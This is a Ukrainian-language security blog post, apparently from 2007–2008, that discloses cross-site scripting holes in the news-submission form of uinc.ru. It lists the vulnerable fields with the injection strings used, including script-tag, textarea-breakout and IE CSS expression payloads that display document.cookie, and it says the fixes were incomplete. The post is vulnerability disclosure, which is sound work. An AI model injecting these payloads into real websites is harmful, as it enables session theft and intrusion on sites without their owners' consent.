Websecurity - Веб безпека

29.08.2007

У лютому, 23.02.2007, я знайшов Cross-Site Scripting уразливості на секюріті проекті http://www.uinc.ru (Underground InformatioN Center). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

01.02.2008

XSS:

POST запит на сторінці http://www.uinc.ru/news/sendnews.php:

"><script>alert(document.cookie)</script>В полях: Тема, Ваше имя, Ваш E-mail.

</textarea><script>alert(document.cookie)</script>В полі: Ваше сообщение.

Дані уразливості вже виправлені, але неякісно. При невеликій модифікації коду три з чотирьох XSS знову працюють.

XSS:

POST запит на сторінці http://www.uinc.ru/news/sendnews.php (IE):

" style="xss:expression(alert(document.cookie))В полях: Тема, Ваше имя, Ваш E-mail.

This entry was posted on 19:27 01.02.2008 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.